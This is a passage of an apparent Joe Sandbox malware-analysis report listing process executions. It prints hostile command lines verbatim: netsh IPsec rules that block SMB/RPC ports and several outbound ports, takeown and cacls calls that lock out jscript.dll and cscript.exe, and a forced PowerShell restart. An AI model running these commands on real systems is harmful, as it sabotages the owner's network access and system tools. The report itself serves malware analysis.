Start time: 05:29:30 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6032 Parent PID: 5248

General

Start time: 05:29:31 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=135 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes Copyright Joe Security LLC 2021 Page 27 of 44 MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6036 Parent PID: 6032

General

Start time: 05:29:31 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6096 Parent PID: 5248

General

Start time: 05:29:32 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=139 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6068 Parent PID: 6096

General

Start time: 05:29:33 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4072 Parent PID: 5248

Copyright Joe Security LLC 2021 Page 28 of 44 General

Start time: 05:29:33 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=445 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 476 Parent PID: 4072

General

Start time: 05:29:34 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5616 Parent PID: 5248

General

Start time: 05:29:34 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=135 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1496 Parent PID: 5616

General

Start time: 05:29:35 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes Copyright Joe Security LLC 2021 Page 29 of 44 MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4568 Parent PID: 5248

General

Start time: 05:29:35 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dst addr=Me dstport=139 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1844 Parent PID: 4568

General

Start time: 05:29:36 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 896 Parent PID: 5248

General

Start time: 05:29:36 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=2222 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 340 Parent PID: 896

Copyright Joe Security LLC 2021 Page 30 of 44 General

Start time: 05:29:37 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4968 Parent PID: 5248

General

Start time: 05:29:37 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=3333 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2072 Parent PID: 4968

General

Start time: 05:29:38 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 2596 Parent PID: 5248

General

Start time: 05:29:38 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=4444 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes Copyright Joe Security LLC 2021 Page 31 of 44 MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5780 Parent PID: 2596

General

Start time: 05:29:39 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4864 Parent PID: 5248

General

Start time: 05:29:40 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=5555 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5972 Parent PID: 4864

General

Start time: 05:29:40 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5916 Parent PID: 5248

Copyright Joe Security LLC 2021 Page 32 of 44 General

Start time: 05:29:41 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=6666 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6056 Parent PID: 5916

General

Start time: 05:29:41 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5296 Parent PID: 5248

General

Start time: 05:29:42 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=7777 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 572 Parent PID: 5296

General

Start time: 05:29:42 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes Copyright Joe Security LLC 2021 Page 33 of 44 MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5040 Parent PID: 5248

General

Start time: 05:29:43 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=8888 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5264 Parent PID: 5040

General

Start time: 05:29:43 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 1752 Parent PID: 5248

General

Start time: 05:29:44 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=9000 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1036 Parent PID: 1752

Copyright Joe Security LLC 2021 Page 34 of 44 General

Start time: 05:29:44 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2436 Parent PID: 372

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: false Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 3520 Parent PID: 5248

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=9999 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2256 Parent PID: 3520

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes

Copyright Joe Security LLC 2021 Page 35 of 44 MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5228 Parent PID: 5248

General

Start time: 05:29:46 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=14443 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5440 Parent PID: 5228

General

Start time: 05:29:47 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5908 Parent PID: 5248

General

Start time: 05:29:47 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dsta ddr=any dstport=14444 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5860 Parent PID: 5908

Copyright Joe Security LLC 2021 Page 36 of 44 General

Start time: 05:29:48 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5880 Parent PID: 5248

General

Start time: 05:29:48 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=bl ock Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6008 Parent PID: 5880

General

Start time: 05:29:49 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5240 Parent PID: 5248

General

Start time: 05:29:49 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist= Filter1 filteraction=FilteraAtion1 Imagebase: 0x11f0000 File size: 82944 bytes Copyright Joe Security LLC 2021 Page 37 of 44 MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 4344 Parent PID: 5240

General

Start time: 05:29:50 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6056 Parent PID: 5248

General

Start time: 05:29:51 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static set policy name=qianye assign=y Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1256 Parent PID: 6056

General

Start time: 05:29:51 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 644 Parent PID: 5248

Copyright Joe Security LLC 2021 Page 38 of 44 General

Start time: 05:29:52 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\jscript.dll Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2376 Parent PID: 644

General

Start time: 05:29:52 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 4956 Parent PID: 5248

General

Start time: 05:29:53 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\jscript.dll /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 496 Parent PID: 4956

General

Start time: 05:29:54 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496

Copyright Joe Security LLC 2021 Page 39 of 44 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 4488 Parent PID: 5248

General

Start time: 05:29:55 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\jscript.dll Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2100 Parent PID: 4488

General

Start time: 05:29:55 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 3940 Parent PID: 5248

General

Start time: 05:29:56 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\jscript.dll /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 4132 Parent PID: 3940

General

Copyright Joe Security LLC 2021 Page 40 of 44 Start time: 05:29:56 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 2212 Parent PID: 5248

General

Start time: 05:29:58 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\cscript.exe Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1712 Parent PID: 2212

General

Start time: 05:29:59 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 2604 Parent PID: 5248

General

Start time: 05:30:02 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\cscript.exe /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true

Copyright Joe Security LLC 2021 Page 41 of 44 Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5548 Parent PID: 2604

General

Start time: 05:30:02 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: takeown.exe PID: 5504 Parent PID: 5248

General

Start time: 05:30:04 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\takeown.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\cscript.exe Imagebase: 0x9f0000 File size: 52224 bytes MD5 hash: 13FC919F91DAE13EA83970363CE170BD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5864 Parent PID: 5504

General

Start time: 05:30:04 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: cacls.exe PID: 5268 Parent PID: 5248

General

Start time: 05:30:05 Start date: 24/08/2021 Copyright Joe Security LLC 2021 Page 42 of 44 Path: C:\Windows\SysWOW64\cacls.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\cscript.exe /E /P everyone:N Imagebase: 0xe30000 File size: 27648 bytes MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6108 Parent PID: 5268

General

Start time: 05:30:06 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: powercfg.exe PID: 6092 Parent PID: 5248

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\powercfg.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\powercfg.exe' /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c Imagebase: 0xe60000 File size: 80896 bytes MD5 hash: FA313DB034098C26069DBADD6178DEB3 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6044 Parent PID: 6092

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Copyright Joe Security LLC 2021 Page 43 of 44 Analysis Process: powershell.exe PID: 6072 Parent PID: 5248

General

Start time: 05:30:07 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Start-Sleep -Seconds 900; Restart-Computer -Force Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET

Analysis Process: conhost.exe PID: 3556 Parent PID: 6072

General

Start time: 05:30:08 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 33.0.0 White Diamond

Copyright Joe Security LLC 2021 Page 44 of 44